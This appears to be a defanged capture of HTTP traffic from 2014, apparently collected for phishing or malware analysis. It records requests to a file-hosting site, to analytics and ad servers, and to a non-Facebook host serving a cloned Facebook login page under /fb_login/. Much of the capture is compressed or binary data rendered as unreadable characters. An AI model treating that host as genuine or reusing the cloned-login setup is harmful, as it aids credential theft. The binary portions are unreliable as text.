............k{.H.7...O.=3.jd..:B.|.q.v..[U=.3..%@.q.F`......_Df*%............cddddddD..O..j...<>z..;|.......c.??|/..'.|....xR/]..=y.....'._..t...q..O.Q...M...............I.JY..%...$....n8 ..a..4............tT..F.>...............HJ'..|x....w.R..?..eiu.M..U....z]*./&.tY....?..Y).G.%.$.^..w..p27IU..P....q./..i.....y8..F..:....`....*E6[.$7.L.....[-*Rk..._).O...z.4.[......Z4...7....,./f.R...5n.T.0.......h.z.V..b.."...n.....M.7......U'.z......&...,..8..F(.^O..<q...@.S...............,..............Td.]P.u.u..b4j.....4..J.f.xVv>2.%..V...P...R;.'.nx.M...6n1.........v.i.E~.:.'.y..xC.y.8..Pr.....QcT....*.w..~st..:AB]....~......!.............d.5.)C}.e........alI>!"X..i.j'...(.......t......U...<.-i.NG.r....f.....4.........<...4........w...W..z......N<..s.sO.\_...<.........q8.......[........w.}{.j6..DV....z.3/].^..x].)U..Va.:...p.^d...c.%....-T....Y..Mf#....2...6 R...6*..K..J.......3"P.h.!...Peh....@.v......C....!Q.G#bL.........5$..m.j%.............!!.V.q.0...l.............M.@..[.C^......8v...Z4....&v....Y.=7d..xl...7@o.......i...?....@..nDk....^.......F.b....H.....ytF ..;.t....m......um......\.m..5.....^.;....x.`7)..$......z<A........S.f5..#..f=.L......_.....)fK{....i.u.ww.d:.....7....Vw*..N_.....:...@.V....,....J.. .....M.J..7W........3%.E..y. ....B...&.5K...V-..1lT...#.Y.....&.5....=.....<.h..Es...8"_.U....?m..Q.J4.......O.q;....<<s..D.O.'..].e.....y.:.&e.......z.j. ....F.w...>......?........&...9z0..).F..V.f..X..K.......a....q.......:Q.....p7a.."...$.`Q?.(.........!.;.c.g....

<<< skipped >>>

GET /ga.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google-analytics.com

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 13:06:01 GMT

Expires: Sat, 31 May 2014 01:06:01 GMT

Last-Modified: Thu, 08 May 2014 18:54:47 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 15790

Age: 10211

Cache-Control: public, max-age=43200

Alternate-Protocol: 80:quic

...........}kw.:............Io@R..........l.,.iH.....$...3#......s.z7..<..e4....x2.Y/.....>^.<.C.D......j...0c!...qo.....A*....L&..x.K..w.*8..%.<..|..)d.X.......&..*... .Q...(.....8..q..\.!...a..0...$.tX..N&..a?!..zB:l.8c9.p.....;l..x.$c.]AP\..>..B...&..:pz.H........g...Ap..!.5..K......V;l.H.....V.a.....s.$p......39...a.a.P'9.b.;H>N.$..A..... ..^..{h.h...2l_..N...w9..d.@.`._.N..7..|....%.d.%......%.{.....&.@.I..:....F.{..c.nzP*..a..LzP.sl...V..y.U8*&.......}.BH@..ZC...Ty. u.Y...!..R.h.V..h./>3...*.P..(..:A.}..v.C ..M..Vk.......\..d....he.q..u.u..yE./J.Re..|:u..L...B..E..Tn/v \.<...8..MU.g.....{.`..}.;n.....x................4...kG..[q....0r7.....l.n?..@|.%W.g....V..../.a......P`....t W.VNq.#.......}.WL....,X.a....{..*..!<W.......e.{.$.e......[......S....(.).K..........>....X5o{i&.X..A.F.T"h.....KB...^]..f..z3.jyYcy......@..#Y*.z.Jl.#w...S...^..a..A..F....q.!...6~...1....P.......`..= .M.(.^.@.5.L...y..P.".v.........L...R.....[...fx....o...K...s..!..........oa.F..V......)..ym...;......a..r..N. ....Y.5o.u|..K...}l[i.....N.-%...4.I..(..'.....PR..gnAx...A.D.....w..5W..m. .....Zno........d<hpf...s.e#..v...p..g...[.G.k.2.c.6.....5..Lcc.fUm/.P!....!U.c.......d78!7.......V>&."..Q$.....&.sS..Kq....].UySz=..3..$.".;..".'.Kar\[...t\....;...h._.O..b...2....{=H9@...v0l)2!..xD7...T..Di.w.RC`.m.8.\....J....h..u{{.....p..)..O3.W.........k...y.`^ ....&1..f"..D.W.}.;D:d.F....p#... ......d...T..iU7n.;-hh..T..^P....U.....>...T..m....fC....>..>d..Q..!....X1......7L...[.........;.w...[L.LB.

<<< skipped >>>

GET /__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=VVV.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google-analytics.com

HTTP/1.1 200 OK

Pragma: no-cache

Expires: Wed, 19 Apr 2000 11:43:00 GMT

Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Date: Thu, 29 May 2014 01:06:01 GMT

Server: Golfe2

Content-Length: 35

Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate

Age: 139811

Alternate-Protocol: 80:quic

GIF89a.............,...........D..;..

GET /fb_login/index_files/QzuAG9bQwbS.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 280389

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364593181,173213727*/...fbEmuTracking{position:absolute;visibility:hidden}..tinyViewport div._22r, div._22r{position:fixed !important;right:-300px !important;width:244px}..tinyViewport ._22q div._22r, ._22q div._22r{width:122px}.div._22q #pagelet_rhc_footer{display:none}.div._22q .ego_column, div._22q{width:122px;z-index:1}.div._22q .image_body_block{padding-top:0}.div._22q .fbEmuImage{float:none}.div._22t .uiSideHeader{background:none;border-bottom:1px solid #c8d1e2;border-top:0;padding:4px;margin-bottom:0}.div._22t .ego_unit{margin-bottom:7px;padding-top:3px;border-color:#c8d1e2}.div._22t div.ego_section > div{padding-left:0;padding-right:0}.._22t .uiSideHeader h4{color:gray;font-weight:normal}.._22q a.uiHeaderActions{display:none}.._22s{bottom:auto;top:50px}..timelineLayout ._22t{bottom:15px;padding-top:12px}..pagesTimelineLayout ._22t{padding-top:51px}.._3nl ._22t{padding-top:0;width:315px}.._3ms_ ._22t{padding-top:0}..permalinkBody ._22t .uiBlingBox{border-bottom:none}.button.async_saving .default_message,.a.async_saving .default_message,.form.async_saving .default_message,..saving_message{display:none}..default_message,.button.async_saving .saving_message,.a.async_saving .saving_message,.form.async_saving .saving_message{display:inline}..async_throbber .async_saving{background:url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}..async_throbber_left .async_saving{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif) no-r

<<< skipped >>>

GET /_js/global.js?ver=d10 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 66902

Last-Modified: Mon, 03 Feb 2014 21:56:14 GMT

Connection: keep-alive

ETag: "52f0107e-10556"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

var globalMouseX;.var globalMouseY;.$(document).ready(..function()..{...if ((navigator.platform.indexOf("iPhone") != -1) || (navigator.platform.indexOf("iPod") != -1))...{....$("input:file").parent().append("Upload is not supported by your device!");....$("input:file").hide();....$(".upbutton").hide();...}...makeDraggables();...$('.gbutton').click(function(event)...{....event.stopPropagation();...});...$('#tools_menu').click(function(event)...{....event.stopPropagation();...});....window.page=2;...$(window).scroll(function()...{....if($(window).scrollTop() 200 >= $(document).height() - $(window).height())....{.....nextPage(false);....}....if($(window).scrollTop()>=195)....{.....$("#home_member_filesmenu").css({position:'fixed', top:0});.....$("#home_member_filesmenu_ph").css('height', $("#home_member_filesmenu").css('height'));....}....else....{.....$("#home_member_filesmenu").css({position:'relative', top:''});.....$("#home_member_filesmenu_ph").css('height', '0px');....}...});....$("body").mousemove(....function(e)....{.....globalMouseX = e.pageX;.....globalMouseY = e.pageY;....}...);...//GT CLIENT PAGE...$('.collapsible').children().hide();...$('.collapsible').click(....function(e)....{.....if ($(this).children().css('display') == 'block').....{......$(this).children().hide();......$(this).css('background-image', 'url(/_images/ico_expand.png)');.....}.....else.....{......$(this).children().show();......$(this).css('background-image', 'url(/_images/ico_collapse.png)');.....}....}...);...$('#home_membe

<<< skipped >>>

GET /_images/ajax-loader.gif HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/gif

Content-Length: 673

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-2a1"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

GIF89a................BBB...bbb......!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,..........3....0.Ik.c.:....N.f.E.1.......`..q.-[.9...9...Jk.H..!.......,..........4....N.! .......DqBQT`1. `LE[..|..u..a... ....C..%$*..!.......,..........6..2# .A....V/..c....N.IBa..p......... .Y.......2.d.....!.......,..........3..b% .2....V_.....!..1D.a...F.....bR].=.08,....r9L..!.......,..........2..r' J.d....L..&v.`\bT.....hYB)..@....<..&,....R...!.......,..........3.. ..9..t....0....!.B...W..1....sa..5....0.....m)J..!.......,..........2.........U]....qp.`..a..4..AF.0..`......@..1.......!.......,..........2....0.I.eB..)..... ..q..10....P..a..V... ub...[....;.............

GET /_images/header_sync.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1395

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-573"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..WMLcU.>..............%......d.GL&C....A.1&.........DW.b......G...I.F.J.v(.8.Bi..2...{.{)."..&..$.........|..[F.E8Ma.......S. !?..-......CL3.....z .6.....~{.......PWT.B&...%m.....J?.IX]...."......*.j=.. :.69A..@....{....}.e.......u56.\...A>..t:}u9......$..z...Pt.<j..6......Z.Z...D.,.. ...f.W....O...]F...........k2...N6.</Z.&..CJD*...e2.U..8>6...w..|...<.@Y.Z....b5.\J....EKZ.BA...~.......<.#O..@..B..9....1......o.......p..3.|O...P.)(....y..y.>S.h_..W......=...!...N...............@. =...v........^...L.....555.mmm4...hv.[L5.-.s..o.........0..uwuM.y5....:O$.............*q.....b.....twwS......1.x.G7..A4.{......[..&.CNB.. ....Xl..N'.V. . ?,...p..;..r.t...9...K.S.....o.g..T8..06<|.n1:Xt\`2..P.3.G.S......oQ..\..v?r,..B..Ws.P......E.#....n.79d.n...;Y../.......T.......q..........T*....B...z.|..Mp..#J...!..-).E.(......!..*.%S)..0%....0..88....i.`.....s.Q..F......q.....<;<...-.DB....p..F#D#.8..HA>...1V*c!...u...%....8.L."...y..A..z...C2..[1........W...`.Y..8Ga.l.&.0..&..G*5..........; B.),.t..=.E..!.F....t...^|v.jx..ggKl..$.)...h<....b%............hd.j.....%......%..Y...d..o.........E*.J...G......D......"@r-....z..f$.."'.....x.u_....].t.D..4....b.2.L......l.........y<.....Mx...r/..z....B~.[7.f..l.....?.s.$...VVV.VWW.H.#V9..,..._D....]UU.1.. x.D.SI.d..3.P..j.kh"...Pn..KLz......Z~...........HQ..B....IEND.B`...

<<< skipped >>>

GET /fb_login/index_files/tjP47PMhke1.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 20579

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364175991,173217823*/..if (self.CavalryLogger) { CavalryLogger.start_js(["fKd4 "]); }..__d("NotificationURI",["URI"],function(a,b,c,d,e,f){var g=b('URI'),h={localize:function(i){i=g(i);if(!i.isFacebookURI())return i.toString();var j=i.getSubdomain();return i.getUnqualifiedURI().getQualifiedURI().setSubdomain(j).toString();},snowliftable:function(i){if(!i)return false;i=g(i);return i.isFacebookURI()&&i.getQueryData().hasOwnProperty('fbid');}};e.exports=h;});.__d("DoublyLinkedListMap",["copyProperties"],function(a,b,c,d,e,f){var g=b('copyProperties');function h(){this._head=null;this._tail=null;this._nodes={};this._nodeCount=0;}g(h.prototype,{get:function(i){return this._nodes[i]?this._nodes[i].data:null;},_insert:function(i,j,k,l){k&&!this._nodes[k]&&(k=null);var m=(k&&this._nodes[k])||(l?this._head:this._tail),n={data:j,key:i,next:null,prev:null};if(m){this.remove(i);if(l){n.prev=m.prev;m.prev&&(m.prev.next=n);m.prev=n;n.next=m;}else{n.next=m.next;m.next&&(m.next.prev=n);m.next=n;n.prev=m;}}n.prev===null&&(this._head=n);n.next===null&&(this._tail=n);this._nodes[i]=n;this._nodeCount ;return this;},insertBefore:function(i,j,k){return this._insert(i,j,k,true);},insertAfter:function(i,j,k){return this._insert(i,j,k,false);},prepend:function(i,j){return this.insertBefore(i,j,this._head&&this._head.key);},append:function(i,j){return this.insertAfter(i,j,this._tail&&this._tail.key);},remove:function(i){var j=this._nodes[i];if(j){var k=j.next,l=j.prev;k&&(k.prev=l);l&&(l.next=k);this._head===j&&(this._head=k);this.

<<< skipped >>>

GET /fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 522

Content-Type: image/gif

Age: 0

Connection: close

Server: YTS/1.20.28

GIF89a.............p....................Ro...................!..NETSCAPE2.0.....!.......,.......... ..I....e....)."-...%..g..i..tio..~..0.......!.......,...........P.$........wIT..!.......,..........2..)R.s.s.L..d.A......."..)...Y.lF.......y.M.(.U....!.......,..........>..I.HIT...R. .P..t....I1.....H.....Y....`.a....}L....&6..u..d".!.......,..........=..I....`.2.P..t...(."..P.....,..........w........OhTJ.........!.......,..........3..I....e...P...(.d.R1...2r...\3...=.....>..24.`..J..!.......,.............%.......T..;..

GET /ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google.ca

HTTP/1.1 200 OK

Content-Type: image/gif

Date: Fri, 30 May 2014 15:56:13 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

X-Content-Type-Options: nosniff

Server: adclick_server

Content-Length: 42

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic

GIF89a.............!.......,...........D.;..

GET / HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; path=/

Expires: Fri, 30 May 2014 15:56:10 GMT

Cache-Control: no-cache

Pragma: no-cache

Set-Cookie: landing_url=/; expires=Sun, 29-Jun-2014 15:56:11 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

X-Frame-Options: DENY

1208.............;is....._.sfG..$J>.X.4k.r.}..c..K.X .Q.).....M..v. EJ.egv.6U.(.......p..jp.?.C2N&~..!~.....=c.$a.4..ik....gv....'.1.o6......q8a.%..d....g.D.. i..Bf.G}...{JL.~@.1.b....N...bJ<.O|.?.>.............%8.7.i..|&.E...k../R..&"..;4..D....$......A"...8...1c.A.............-x.....kH.`....g>"~B.....\|.D<L....G.F..GN.@..5..-O..g.p........E1......m....y6|.....CS.BR..Y....f...........e...e..// lZ_c...).fK.^7.....p4...w.....6..`.,........b...y..)}@..i,......0.!..Y..^7....:).x.{..TL..p...B.......%.c..d ..j.#.K...n.cg{.o.........w...M...m...w{.>........nFB$.|.....)BlLy..`.>.g.s.....(...,... ..?...-.o....p~.B..-p\k.......@...AL.........$.P..S....Y.&!..............!....@L.yz|q. .M....#.....i...o.......rv.-g.."o.....Y...Z..xPk.e..8.A..,.06.(.o.........;>a"M..../...[..!3.....ik..y=...zz4.._].c...s=.......8.Q.. .s....syr.".E....z...iD... .t.l(.C...zM.TM....9.<j#....b......G..?I.4....$...V...........]S.r<.K4...3.^.~P.j..B.......^b}K>.C.~.Y:.1...y0!.`.....C...6..p@B.....R;.~.....Q.m.......v.t@..M...]|.3......6~.......{...x.H..).E7..z.;0$P'..4.E.`....^mR......Oc({dP.(..vg..*.n ../.#.Uc.S,.n.P....,....b......9.g>....y.a..Mx:)...^...p.".#g."...CH..<...c.S..J...#.M.f..!.O...q..<.8K1.....1..V8....},........C.d.4..6c...J31....~.l....vdf.<..b.6.JR..*{)...5.e}.ip.Y..Y..A.S../c .. ...x..,.q1.e..A..#"x`3.. l..L.8..@e..uv...C..c..r.V....9c.<..)c...Ml.......P........k.DT.........^......w...........8.....Hrs.p. .\#w@.,:.f..... ......9I...Gx..B.$s.............?..$.._. Q....M.........f.[

<<< skipped >>>

GET /_css/global.css?v=54 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: text/css

Last-Modified: Thu, 12 Dec 2013 18:00:10 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Content-Encoding: gzip

1d53.............=ko.F..._A..4Im.oQ6......&M.....X....o)Q..8i..~.......Y\.Qe.s.....3gfV.....ggUT....s.'..:mo.....x.l.<.6.../G.&.D.X_...i..=..p.f......s/....e...O..m..'.t.;..mU^..,................~.No....~.b.~.^.M...by{...>.h..'.Y]m~[..Ou........^.L.......E..iW5..M..Uew....m.........C.J..-......_......k..y....1pP....>M..vs........f{..O.i[.}w.\W..O.{...k6.^z..b4N.v.t#.BU..n[.....@.8].M...1..o../...w...sB..*...so....@.;.%.\8u.u...4......... .@ vM]...,...C.....%.d~$Dl........91z..;.q.w.o...H.s..ST.G.^...bw.O.eb.C..v1t.}"w"..uÂ¢.e.~.__%....#.....;]6..5../#..1......>g@F...n.n..E.Q.?..u &..c....O.$.9y..C\.....cH.P.....N.Q.......#..h.}....p...o.._....!.....B.@h .K|..].w....3.^L..X.0.`....u.}.w...<&..M...?..raO)...}.t ?.....8..C..@:< .&..!]..:...~4.Xy..p.....R.....3B.....h.......:..(.f..../\...R..$.I .....!...........)iq.>&.x.>F.7`.`....Cu..bn.#..$. !.\^^R.......z".#....[....H.i^..]..^..e].Ok.-.O.G.\.@.,).rz!..N.......z....Bv...N.....Z..?b"Iz.....z.0P..:..{.E..q..\",...-...o....sc)u..V........b..A..<.............].....r2....A..3......&....).$G6.GIt3(._....m..)..5.of.eH3.*...7.=K..d.../.<.`..p~...............G......d......i.B..._......n4..p..u. 8P........k.....T_..G.?/.v.ay.......=.O.H.Z....m..Q..2...>.....i .4..|.6..Y....E......I....J.A.$.........C!..d.b..M[.5..#...:..4....5.}.`.#<.q.l\.>........J..'.".oAr..g.....ms.u:`..................*.[..g.............7]U...m...{...,.r._0o..i...N`.E..?.0....W1..#...b..).Z....$>.P......q.O&{........j...)...~..i......A..uM^.E..~.......A!.....

<<< skipped >>>

GET /ext/swfupload/swfupload.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 37706

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-934a"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

/**. * SWFUpload: hXXp://VVV.swfupload.org, hXXp://swfupload.googlecode.com. *. * mmSWFUpload 1.0: Flash upload dialog - hXXp://profandesign.se/swfupload/, hXXp://VVV.vinterwebb.se/. *. * SWFUpload is (c) 2006-2007 Lars Huring, Olov Nilz.n and Mammon Media and is released under the MIT License:. * hXXp://VVV.opensource.org/licenses/mit-license.php. *. * SWFUpload 2 is (c) 2007-2008 Jake Roberts and is released under the MIT License:. * hXXp://VVV.opensource.org/licenses/mit-license.php. *. */.../* ******************* */./* Constructor & Init */./* ******************* */.var SWFUpload;..if (SWFUpload == undefined) {..SWFUpload = function (settings) {...this.initSWFUpload(settings);..};.}..SWFUpload.prototype.initSWFUpload = function (settings) {..try {...this.customSettings = {};.// A container where developers can place their own settings associated with this instance....this.settings = settings;...this.eventQueue = [];...this.movieName = "SWFUpload_" SWFUpload.movieCount ;...this.movieElement = null;.....// Setup global control tracking...SWFUpload.instances[this.movieName] = this;....// Load the settings. Load the Flash movie....this.initSettings();...this.loadFlash();...this.displayDebugInfo();..} catch (ex) {...delete SWFUpload.instances[this.movieName];...throw ex;..}.};../* *************** */./* Static Members */./* *************** */.SWFUpload.instances = {};.SWFUpload.movieCount = 0;.SWFUpload.version = "2.2.0 2009-03-25";.SWFUpload.QUEUE_ERROR = {..QUEUE_LIMIT_EXCEEDED. ..: -100,..FILE_EXCEEDS_

<<< skipped >>>

GET /_images/footer_bg.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 702

Last-Modified: Fri, 14 Sep 2012 15:15:38 GMT

Connection: keep-alive

ETag: "50534a1a-2be"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR...9..........Y.b....tEXtSoftware.Adobe ImageReadyq.e<...`IDATx....r.0.D.l.....U,.....t...=.$.4K......8..v.]...8..G.....|n6..Y~.#.2g.)'s..="..H.....q ...2...J.'....]........P.....\'Z.Ib.....A&:A`.#"..z.......%.n..J....:..`..1...9.7.s........d_...M...4.,.;2.?..J....a...T.|.7bo.p.h[...2....6a.V....8.N.i..<*....`..z.b>.t...H9e~8..gH`F.E..w.dP$F..X|....Q ]2.Gk..,.Vs K.....-9 /..pv.l....,.)L....Q...v.&....c.Q..gg.f3.?(y.T...J....%.O.Va.'...^.V.:...4.....R.>..f...e.u..-4.gK./..pK...ln.j?...w.z...P\.[$.U...-v(...|.(.$.5ony...[.-3..-*..[? ..%.f3..`..~v..}........o..[.....H...:..}k.. .s.[."T...{..&}.i6......[..4{X.I..'{pb.o..f.i.....[<F.-.....Rv......E.s.K.7$&..o..`..-io.0UQ....IEND.B`.....

GET /_images/contact_support.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 2437

Last-Modified: Thu, 13 Sep 2012 22:56:56 GMT

Connection: keep-alive

ETag: "505264b8-985"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR...".........M..]....tEXtSoftware.Adobe ImageReadyq.e<...'IDATx..]{l.U.?...c......F..-.@5<ve..'1f.5.... $...Dw5i..Q..&f.?....D.(b..UYt..E.D..*.-..nw....:3............~c.9.M........;...V4.t..=..k.X;.......tQ.......X..zD.O.=..../ ..Q[4..w.:..].Ajm......[..k..V ..?..uo..S.......`Y.@..F...~.)!.:.Lry...-.Uo.*....Y..._.......eSY.. .....$U...a ...0...@...a ...0...@...a ...0...@....RY.?j.....A:ptX...s.....h.W....$.....=........#.'.....}.......QA..k. .i..-..i......k..|..V/.......g.......|..|.0.n.%.....w..........Q ....q.........4....J.5.'..... ..P.Qg..g(FtZ(....Z>.'??p4\z U).8c.'.5...........Gb.......G.9......#P......I.....pq.......OD..bi...&r..A.grl.d.a...g...eOwZ.H....(@..!}[. . h!x!.....{..>94>P..VW_......l.3.."]SXZ5.#.8..n...z...."......9..@..."...7..w]=]8......~.......S]}..[.N..\J.R...l.UT.u..~.c 